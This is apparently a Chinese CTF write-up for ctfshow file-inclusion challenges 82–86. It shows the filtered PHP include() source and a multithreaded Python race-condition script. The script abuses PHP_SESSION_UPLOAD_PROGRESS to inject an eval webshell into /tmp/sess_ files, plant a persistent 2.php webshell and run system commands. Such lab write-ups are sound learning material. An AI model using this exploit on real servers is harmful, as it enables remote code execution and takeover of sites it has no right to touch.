ctfshow-web入门-文件包含-82-86 条件竞争脚本


web82-86

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 19:34:45
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

这题使用到了PHP_SESSION_UPLOAD_PROGRESS这个参数,这个参数是为了事实获得文件上传的进度的,即使没有开启session,只要我们上传的cookie里带有PHPSESSID,他就会在默认目录生成对应文件/tmp/sess_xxxxx,这样我们就可以控制文件名字,控制文件内容我们就需要使用PHP_SESSION_UPLOAD_PROGRESS。如果PHP_SESSION_UPLOAD_PROGRESS=>”123”->/tmp/sess-xxx->123。

直接使用脚本

import io,threading,requests
url = 'http://bb5282b9-dc00-44d5-98f0-1c93ed240d67.challenge.ctf.show:8080/'
sessionid = 'test'
data = {
    '1':'file_put_contents("/var/www/html/2.php","<?php eval(\$_POST[2]);?>");'

}

def write(session):
    while 1:
        fileBytes = io.BytesIO(b'a'*1024*500)
        response = session.post(url,data={
            "PHP_SESSION_UPLOAD_PROGRESS":"<?php eval($_POST[1]);?>"
        },
        cookies = {
            'PHPSESSID':sessionid
        },
        files = {
            'file':('test.jpg',fileBytes)
        })
        # print(response.text)

def read(session):
    while 1:
        response = session.post(url+'?file=/tmp/sess_'+sessionid,data=data,
                                cookies = {
            'PHPSESSID':sessionid
        } )
        response2 = session.get(url+'2.php')
        if response2.status_code == 200:
            print("+++++++++++done+++++++++++")
        else:
            print(response2.status_code)


if __name__ == '__main__':
    event = threading.Event()
    with requests.session() as session:
        for i in range(5):
            threading.Thread(target=write,args=(session,)).start()
        for i in range(5):
            threading.Thread(target=read, args=(session,)).start()
    event.set()

然后访问2.php,payload2=system('tac f*.php');就可以了


文章作者: Rolemee
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Rolemee !
  目录